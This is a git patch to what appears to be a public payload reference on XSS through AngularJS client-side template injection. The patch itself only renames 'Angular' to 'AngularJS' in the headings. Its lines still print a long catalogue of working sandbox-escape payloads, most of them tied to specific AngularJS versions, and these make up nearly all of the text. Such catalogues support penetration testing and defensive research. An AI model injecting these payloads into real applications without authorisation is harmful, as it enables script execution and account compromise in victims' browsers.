From e95b0c34a3e01e0510e81f1eb98065fd109b7da9 Mon Sep 17 00:00:00 2001 From: Kyle Martin Date: Sat, 7 Dec 2019 10:54:47 +1300 Subject: [PATCH] clarify AngularJS vs Angular --- XSS Injection/XSS in Angular.md | 40 ++++++++++++++++----------------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md index 21302e8..1749a9a 100644 --- a/XSS Injection/XSS in Angular.md +++ b/XSS Injection/XSS in Angular.md @@ -1,20 +1,20 @@ -# XSS in Angular +# XSS in Angular and AngularJS ## Client Side Template Injection The following payloads are based on Client Side Template Injection. -### Stored/Reflected XSS - Simple alert +### Stored/Reflected XSS - Simple alert in AngularJS -> Angular as of version 1.6 have removed the sandbox altogether +> AngularJS as of version 1.6 have removed the sandbox altogether -Angular 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin) +AngularJS 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin) ```javascript {{constructor.constructor('alert(1)')()}} ``` -Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265) +AngularJS 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265) ```javascript {{[].pop.constructor('alert\u00281\u0029')()}} @@ -22,7 +22,7 @@ Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/103153474608 Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D) -Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830) +AngularJS 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830) ```javascript {{0[a='constructor'][a]('alert(1)')()}} @@ -30,7 +30,7 @@ Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/105588761 {{$on.constructor('alert(1)')()}} ``` -Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh) +AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh) ```javascript {{ @@ -49,25 +49,25 @@ Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh) }} ``` -Angular 1.5.0 - 1.5.8 +AngularJS 1.5.0 - 1.5.8 ```javascript {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} ``` -Angular 1.4.0 - 1.4.9 +AngularJS 1.4.0 - 1.4.9 ```javascript {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} ``` -Angular 1.3.20 +AngularJS 1.3.20 ```javascript {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} ``` -Angular 1.3.19 +AngularJS 1.3.19 ```javascript {{ @@ -76,7 +76,7 @@ Angular 1.3.19 }} ``` -Angular 1.3.3 - 1.3.18 +AngularJS 1.3.3 - 1.3.18 ```javascript {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; @@ -84,7 +84,7 @@ Angular 1.3.3 - 1.3.18 $eval('x=alert(1)//'); }} ``` -Angular 1.3.1 - 1.3.2 +AngularJS 1.3.1 - 1.3.2 ```javascript {{ @@ -94,7 +94,7 @@ Angular 1.3.1 - 1.3.2 }} ``` -Angular 1.3.0 +AngularJS 1.3.0 ```javascript {{!ready && (ready = true) && ( @@ -113,37 +113,37 @@ Angular 1.3.0 );}} ``` -Angular 1.2.24 - 1.2.29 +AngularJS 1.2.24 - 1.2.29 ```javascript {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} ``` -Angular 1.2.19 - 1.2.23 +AngularJS 1.2.19 - 1.2.23 ```javascript {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} ``` -Angular 1.2.6 - 1.2.18 +AngularJS 1.2.6 - 1.2.18 ```javascript {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} ``` -Angular 1.2.2 - 1.2.5 +AngularJS 1.2.2 - 1.2.5 ```javascript {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} ``` -Angular 1.2.0 - 1.2.1 +AngularJS 1.2.0 - 1.2.1 ```javascript {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} ``` -Angular 1.0.1 - 1.1.5 and Vue JS +AngularJS 1.0.1 - 1.1.5 and Vue JS ```javascript {{constructor.constructor('alert(1)')()}}